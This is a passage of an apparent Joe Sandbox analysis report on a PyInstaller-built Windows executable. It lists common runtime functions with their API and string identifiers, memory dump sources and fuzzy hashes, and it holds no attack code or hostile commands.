                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                            • API String ID: 2920928814-2573406579
                                                                                                                                                                                                            • Opcode ID: 1ca30c699dbe1e4654e7c4d5696967e2b1b1a4f4c1085b5d0a2cfb7980eebcbf
                                                                                                                                                                                                            • Instruction ID: 17fb1699a05c61cbdc09241799714393370da5cb60ca5b8fb7cf3026fd644b7a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ca30c699dbe1e4654e7c4d5696967e2b1b1a4f4c1085b5d0a2cfb7980eebcbf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A521A131B0EA82A6E760EF10E84027AF6A1FF98346FC54035E54DA26B4EF3CD155C720
                                                                                                                                                                                                            Function 00007FF7ACE8B5DC Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                            • Opcode ID: fbdfe3cbec041ac85cd1f64ea4b15fcfe09a87be1aa09ac25d8a719fe1a921a3
                                                                                                                                                                                                            • Instruction ID: 5cdc8236ba3edd1a04c0d69f64c4cd58851fee1a70d465b1c8bdee2caf4207c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbdfe3cbec041ac85cd1f64ea4b15fcfe09a87be1aa09ac25d8a719fe1a921a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4031727360DB8199EB609F60E8803EDB361FB44745F854039DA4E67BA8DF38D548CB20
                                                                                                                                                                                                            Function 00007FF7ACE99A14 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                            • Opcode ID: e7141d2691e6fffc336151182819a094942dc067ac16da689744b042d81b35af
                                                                                                                                                                                                            • Instruction ID: 524421e0cbc9ec56c27415ba1cb9c979d7c052f119fd1ead870d0783ffa5ae5e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7141d2691e6fffc336151182819a094942dc067ac16da689744b042d81b35af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6231B43361DB81A6EB60DF24E8402AEB3A0FB88755F850135EA8D53BA4DF3CC555CB10
                                                                                                                                                                                                            Function 00007FF7ACEA08E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                            • Opcode ID: f73aa23eabfd20fda03901ff7faf855d9e478a94a0c2f1e1aa16d97b926a899c
                                                                                                                                                                                                            • Instruction ID: c9f3e98de7364faefdf41d73c3130f2a03373d05b88e5e864d0b95272ff02b72
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f73aa23eabfd20fda03901ff7faf855d9e478a94a0c2f1e1aa16d97b926a899c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4B1B632B1E6826DEA61AB2195002B9E390EF44BD5F8A5131ED5E27BE5DF3CE441C310
                                                                                                                                                                                                            Function 00007FF7ACEA2C60 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                            • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                            • Instruction ID: cacc7587c640c3d8223a4519f15d54d57cda769437a3a7113cb3e9139fe9921a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21C16A72B1E6859BD724DF1AE08466AF791F788B85F8A8135DB4E23754CB3DE801CB00
                                                                                                                                                                                                            Function 00007FF7ACEA8A98 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                                            • Opcode ID: 90f8d2508151a2821edd8705c6830792bf37d4c2f418efb34635905aa3d93be8
                                                                                                                                                                                                            • Instruction ID: d3788ed96196b0ff439393f19f8f38d895ac84470e1aadccabde2ef8e808855f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90f8d2508151a2821edd8705c6830792bf37d4c2f418efb34635905aa3d93be8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79B18D77609B888FEB29DF29C4463687BE0F744B49F1A8922DA9D837B4CB39D451C710
                                                                                                                                                                                                            Function 00007FF7ACE87790 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                            • Opcode ID: d7ae6b57d221e0bba94e95162e8d18faf84dbf886ae199d20af9c81c2035df64
                                                                                                                                                                                                            • Instruction ID: 9b11875de9072b5e39a8aa8b326d0d00dde14219fd1978f64d3316790ce0f541
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7ae6b57d221e0bba94e95162e8d18faf84dbf886ae199d20af9c81c2035df64
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86F0D132A1E78196EBA09F64E488766B350EB40725F850335E66D226E4DF3CD018CB10
                                                                                                                                                                                                            Function 00007FF7ACE92B34 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                            • API String ID: 0-227171996
                                                                                                                                                                                                            • Opcode ID: a020c1348df748786c6fc3e6f0d32bf571f59c10c0dece7ade91a17eca74ce91
                                                                                                                                                                                                            • Instruction ID: a94a228d544a6fbf4df6b6c41135968fc4241f38ee8f220d184bc6db520730fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a020c1348df748786c6fc3e6f0d32bf571f59c10c0dece7ade91a17eca74ce91
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48E1C532A0E64692EF68AE25805017DF3A0FF45B48F964275EE0E677B4DF39E841C760
                                                                                                                                                                                                            Function 00007FF7ACE9CFC8 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                            • Opcode ID: 5a7a9f69d7c0008c7cda2ee947bdc0d9f87d51e3163b40c536a3f3ccbb6c484c
                                                                                                                                                                                                            • Instruction ID: 22e107aa50be863feb951f79ce30ed21f30434b2575592bd3c45da9d30416c25
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a7a9f69d7c0008c7cda2ee947bdc0d9f87d51e3163b40c536a3f3ccbb6c484c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D519833B1D2D156E7209E369800769FB91E744B90F898271DBAC8BBE1CF3ED5418710
                                                                                                                                                                                                            Function 00007FF7ACE9F938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1010374628-0
                                                                                                                                                                                                            • Opcode ID: d9c3fe3541d8cc50b57763fefdf599488ea3422849496e59e15aa9730f7a25ee
                                                                                                                                                                                                            • Instruction ID: c00cb3ab24a1eaef5f697780ad7f4e8abc734c59596eecdcef249f01e42f7bca
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9c3fe3541d8cc50b57763fefdf599488ea3422849496e59e15aa9730f7a25ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE02B031A0F64264FE65BB119851279E680AF01BA0FC65675FD6E6A3F2DE3CE8018321
                                                                                                                                                                                                            Function 00007FF7ACE9CB34 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                            • API String ID: 0-1523873471
                                                                                                                                                                                                            • Opcode ID: cf9e926bd06e6296f4aba0f07622bacccd0840f3ce88d9759f2d176c501fd3f5
                                                                                                                                                                                                            • Instruction ID: 0f454f26e2e6a212a4f2a068c557b51a0244f3e94476596f4294ec65552eadc9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf9e926bd06e6296f4aba0f07622bacccd0840f3ce88d9759f2d176c501fd3f5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5A17773B0E7C596EB21EB29A0007B9FB90EB51B84F468071EE8E577A1DA3DE501C710
                                                                                                                                                                                                            Function 00007FF7ACE96EC8 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: TMP
                                                                                                                                                                                                            • API String ID: 3215553584-3125297090
                                                                                                                                                                                                            • Opcode ID: ec640adac2f88b1d3391d3d7222849678fbd48a7668bf7398b1338a4f0517d20
                                                                                                                                                                                                            • Instruction ID: 60ad6d3df06e162cf5fdbb992e426545a8e1912cf3965504e8cb15cbde51a9dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec640adac2f88b1d3391d3d7222849678fbd48a7668bf7398b1338a4f0517d20
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F51F635B1F202A1FAA4BB2655025BAD2946F44BC4FCA4075FD1E677F2EE3CE4068220
                                                                                                                                                                                                            Function 00007FF7ACEA24D0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                            • Opcode ID: 9f41e9cda47aae22f82be4ce0ab7cd412b3cc0fc70eb2a248d538cdb5c6fb34a
                                                                                                                                                                                                            • Instruction ID: a09fdbf0bde5905acbda14d5dfd3904a6389ea5fe00987e75e3860999da4a017
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f41e9cda47aae22f82be4ce0ab7cd412b3cc0fc70eb2a248d538cdb5c6fb34a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30B09B70E0F705E5D50837115C4111453547F58701FD90074C00CA1330DF2C51B55710
                                                                                                                                                                                                            Function 00007FF7ACE92730 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 45d7714d5ca7358c377d8bb445432fedb4a83b36a583ecf09d0c06c9540aab40
                                                                                                                                                                                                            • Instruction ID: 52d3cc0bd64da97e08248b82a7a35770f58e91504c14b351027594bad260634a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45d7714d5ca7358c377d8bb445432fedb4a83b36a583ecf09d0c06c9540aab40
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59D1E532A0E64266EF78AA29804027DE3A0FF05B58F965275EE0D276F5DF3DD845C360
                                                                                                                                                                                                            Function 00007FF7ACE89CC0 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0b086e8f388e79d9875e8562cc3e7603ffd3c462abec3081be3315d6d619fb4b
                                                                                                                                                                                                            • Instruction ID: 1022f93a32459c3a152f5a9ed488eb3244716886a1a12da37e7849f22131024d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b086e8f388e79d9875e8562cc3e7603ffd3c462abec3081be3315d6d619fb4b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01C105732181E04BD289EB29E45A87A73D1F78830AFD4442BEB9B77B85C63CE514D721
                                                                                                                                                                                                            Function 00007FF7ACE91DA0 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
